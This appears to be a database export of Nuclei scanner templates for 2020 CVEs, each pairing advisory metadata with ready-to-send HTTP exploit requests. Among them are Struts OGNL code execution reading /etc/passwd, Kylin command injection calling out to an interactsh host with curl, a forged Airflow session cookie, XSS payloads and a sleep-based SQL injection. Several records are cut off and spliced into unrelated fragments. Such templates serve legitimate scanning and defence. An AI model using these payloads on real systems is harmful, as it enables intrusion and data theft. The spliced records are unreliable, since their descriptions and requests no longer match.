raw:\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains(body_1, 'Redirecting...')\"\n - \"status_code_1 == 302\"\n condition: and\n\n - type: word\n part: body_2\n words:\n - \"DAG\"\n - \"Recent Tasks\"\n - \"Users\"\n - \"SLA Misses\"\n - \"Task Instances\"\n condition: and\n# digest: 
4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950", "hash": "6d1225735df356206489afa4047fde62", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081af" }, "name": "CVE-2020-17530.yaml", "content": "id: CVE-2020-17530\n\ninfo:\n name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.\n reference:\n - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html\n - http://jvn.jp/en/jp/JVN43969166/index.html\n - https://cwiki.apache.org/confluence/display/WW/S2-061\n - https://security.netapp.com/advisory/ntap-20210115-0005/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17530\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17530\n cwe-id: CWE-917\n epss-score: 0.97232\n epss-percentile: 0.99826\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2020,apache,rce,struts,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100fab6e8757fd37c5b780da0990fec386241d3b06313f471ca7ebe8f6a0a31b40f0220726c800f75a906c6acab6cfa704f40f77d520675350c7a3ca2efc97ed9ea7873:922c64590222798bb761d5b6d8e72950", "hash": "72c4fba954d8859b5e5a601de1dd99e3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b0" }, "name": "CVE-2020-18268.yaml", "content": "id: CVE-2020-18268\n\ninfo:\n name: Z-Blog <=1.5.2 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. 
An attacker can craft a cmd.php link that sends a user to an attacker-controlled site, which is typically used for phishing and can lead to disclosure of sensitive information, modification of data, and/or unauthorized operations performed under the victim's account. This template logs in with the supplied {{username}}/{{password}} before requesting the redirect, so as written it requires valid Z-Blog credentials (hence the authenticated tag).
name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/zchuanzhao/jeesns/issues/11\n - https://www.seebug.org/vuldb/ssvid-97940\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19282\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19282\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47808\n cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeesns\n product: jeesns\n tags: cve2020,cve,jeesns,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200d8c3150b6b8a8c0f5c30dc6af03f5ed59f49c7172d5b9c124b0069156c4632002202f26a4fd67b93582ef66040e621eed506f3dc6444c34de7e52f2f8a70cd39ae9:922c64590222798bb761d5b6d8e72950", "hash": "e34e000b992b4241b9cfc638be88f46e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b2" }, "name": "CVE-2020-19283.yaml", "content": "id: CVE-2020-19283\n\ninfo:\n name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is 
vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/zchuanzhao/jeesns/issues/10\n - https://www.seebug.org/vuldb/ssvid-97939\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19283\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19283\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47808\n cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeesns\n product: jeesns\n tags: cve,cve2020,jeesns,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ce54269cc6013cc9dfacbcc071ea4ec6aeb9b2705d6dcf5d2f9933efe2f52ac60221009e908e358415d47143c5e20bb6c85ed1313738eef89b12ad1a30fca1ba8d1412:922c64590222798bb761d5b6d8e72950", "hash": "dcd88123b159f1e8b4ba72a2407522b3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b3" }, "name": "CVE-2020-19295.yaml", "content": "id: CVE-2020-19295\n\ninfo:\n name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML 
via the topic name in the /weibo/topic/ URL path, which is reflected into the page without encoding (the injection point is the path segment, not an error-message field, as the request in this template shows).
attacker to read arbitrary files accessible to the FHEM process, for example /etc/passwd, by supplying an absolute path in the file parameter of /fhem/FileLog_logWrapper (dev=Logfile, type=text) as this template does.
remediation: |\n Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.\n reference:\n - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E\n - https://s.apache.org/pr5u8\n - https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-1943\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-1943\n cwe-id: CWE-79\n epss-score: 0.50879\n epss-percentile: 0.97475\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n tags: cve2020,cve,apache,xss,ofbiz\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022006e28c04c6e659e78912043952b0271d2aeef3c1bf3f0bac0fdea8cb76ee8171022100fee8c07cb484ee92a3c0a9102ef9de1b8d6429e5398848261f05f3a3b9507fa9:922c64590222798bb761d5b6d8e72950", "hash": "892953ff1d5baf8d0758aba0845cdc75", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b6" }, "name": "CVE-2020-19515.yaml", "content": "id: CVE-2020-19515\n\ninfo:\n name: qdPM 9.1 - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: |\n qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\\install\\modules\\database_config.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data 
theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting\n - http://qdpm.net/download-qdpm-free-project-management\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19515\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19515\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41242\n cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qdpm\n product: qdpm\n shodan-query: http.favicon.hash:762074255\n tags: cve2020,cve,xss,qdpm,unauth\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/index.php?step=database_config&db_error=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'qdPM'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950", "hash": "48313832b3f07b93531738104785700a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b7" }, "name": "CVE-2020-1956.yaml", "content": "id: CVE-2020-1956\n\ninfo:\n name: Apache Kylin 3.0.1 - Command Injection Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the 
affected server.\n remediation: |\n Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/\n - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706\n - https://nvd.nist.gov/vuln/detail/CVE-2020-1956\n - http://www.openwall.com/lists/oss-security/2020/07/14/1\n - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-1956\n cwe-id: CWE-78\n epss-score: 0.97374\n epss-percentile: 0.99898\n cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: kylin\n shodan-query: http.favicon.hash:-186961397\n tags: cve,cve2020,apache,kylin,rce,oast,kev\nvariables:\n username: \"{{username}}:\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /kylin/api/user/authentication HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n - |\n POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950", "hash": "cc3f5279f4427783b2cf09b26c2930fd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b8" }, "name": "CVE-2020-19625.yaml", "content": "id: CVE-2020-19625\n\ninfo:\n name: Gridx 1.3 - 
Remote Code Execution\n author: geeknik\n severity: critical\n description: |\n Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Gridx.\n reference:\n - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf\n - https://github.com/oria/gridx/issues/433\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19625\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-19625\n epss-score: 0.83118\n epss-percentile: 0.98347\n cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gridx_project\n product: gridx\n tags: cve2020,cve,gridx,rce,gridx_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"6ca86c2c17047c14437f55c42c801c10\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022010116eac10c662352816fdc7275b981a6e39c56d6352ec21d836a4e74a1df0c3022100ba1c1d466fc94f5ae38431892ad204de958a82fa1a79987a48ee5965ccd58aac:922c64590222798bb761d5b6d8e72950", "hash": "300ededbe7eda076b27c847311a4521f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b9" }, "name": "CVE-2020-20285.yaml", "content": "id: CVE-2020-20285\n\ninfo:\n name: ZZcms - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n ZZcms 2019 contains a 
cross-site scripting vulnerability in the user login page: user/login.php reflects the Referer request header unencoded into the value of the hidden fromurl input, so an attacker who can control that header can inject arbitrary JavaScript, which can allow theft of cookie-based credentials and launch of subsequent attacks. Because the injection point is a request header rather than a URL parameter, exploiting it against a victim is harder than a typical reflected XSS (the CVSS vector rates it PR:L/UI:R).
The path exercised here is the uid[] array parameter of /public/index.php/home/index/bind_follow, which wp_where turns into a WHERE clause without sanitization; the template sends uid[0]=exp with an updatexml()-based error payload in uid[1] and looks for the resulting MD5 fragment in the 500 response. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
CVE-2020-2036\n\ninfo:\n name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting\n author: madrobot,j4vaovo\n severity: high\n description: |\n PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/\n - https://security.paloaltonetworks.com/CVE-2020-2036\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2036\n - https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-2036\n cwe-id: CWE-79\n epss-score: 0.03232\n epss-percentile: 0.91005\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: paloaltonetworks\n product: pan-os\n tags: cve2020,cve,vpn,xss,paloaltonetworks\n\nhttp:\n - raw:\n - |\n GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET 
/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(body_1), '')\"\n condition: and\n\n - type: dsl\n dsl:\n - \"status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')\"\n - \"status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')\"\n condition: or\n# digest: 4b0a0048304602210089c6dea6d48684d424ba49681ecb0835c3fda1e87848d90511a39562e7ec6cda022100dd4f07c17897a40e424f03c994207533a61c994bcffab2a1306cb1ef3585a6cc:922c64590222798bb761d5b6d8e72950", "hash": "29a91e69a898a270575a2b89fba3ee08", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bc" }, "name": "CVE-2020-2096.yaml", "content": "id: CVE-2020-2096\n\ninfo:\n name: Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability.\n reference:\n - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683\n - http://www.openwall.com/lists/oss-security/2020/01/15/1\n - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2096\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-2096\n cwe-id: CWE-79\n epss-score: 0.96965\n epss-percentile: 0.99712\n 
cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: gitlab_hook\n framework: jenkins\n shodan-query: http.title:\"GitLab\"\n tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201687a011b3c1d0b082df0fc4bf771617cb0349de4cba006052c27eaba7755f79022100c31de3ab11f6116e0df6b8b2ca349dd4cd9dfbeb7bf1ab32871215d871c1cdbb:922c64590222798bb761d5b6d8e72950", "hash": "68d4012290da5df49eed73f8c2e9682b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bd" }, "name": "CVE-2020-20982.yaml", "content": "id: CVE-2020-20982\n\ninfo:\n name: shadoweb wdja v1.5.1 - Cross-Site Scripting\n author: pikpikcu,ritikchaddha\n severity: critical\n description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/shadoweb/wdja/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20982\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2020-20982\n cwe-id: CWE-79\n epss-score: 0.01894\n epss-percentile: 0.8721\n cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n 
max-request: 1\n vendor: wdja\n product: wdja_cms\n tags: cve2020,cve,xss,wdja,shadoweb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"location.href='\"\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220110601b1a49a68747b9aa3b13bbe9aa31125a8ecb69aea5635e8059b9bccb9cd022100f2d774931b5d7cf5e4fe62bce02077170a346d8e7b43b5fb0bc05e13ef852e8e:922c64590222798bb761d5b6d8e72950", "hash": "69d1c25384ab493ae57680eb4d0f6319", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081be" }, "name": "CVE-2020-20988.yaml", "content": "id: CVE-2020-20988\n\ninfo:\n name: DomainMOD 4.13.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the \"or Expiring Between\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://mycvee.blogspot.com/p/xss2.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20988\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-20988\n cwe-id: CWE-79\n epss-score: 0.0009\n epss-percentile: 0.37789\n cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: 
cve2020,cve,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n POST /reporting/domains/cost-by-owner.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"value=\\\"\\\"/>\")'\n - 'contains(body_2, \"DomainMOD\")'\n condition: and\n# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950", "hash": "35f8e0cd1a6ee891d543555b68de5e98", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bf" }, "name": "CVE-2020-21012.yaml", "content": "id: CVE-2020-21012\n\ninfo:\n name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.\n reference:\n - https://github.com/hitIer/web_test/tree/master/hotel\n - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-21012\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-21012\n cwe-id: CWE-89\n epss-score: 0.07235\n epss-percentile: 0.93887\n cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hotel_and_lodge_booking_management_system_project\n product: hotel_and_lodge_booking_management_system\n tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project\n\nhttp:\n - raw:\n - |\n POST /forgot_password.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n btn_forgot=1&email=1%27%20or%20sleep(6)%23\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Hotel Booking System\")'\n condition: and\n# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950", "hash": "edcf4a6d4fabc12507972faeeae27ebd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
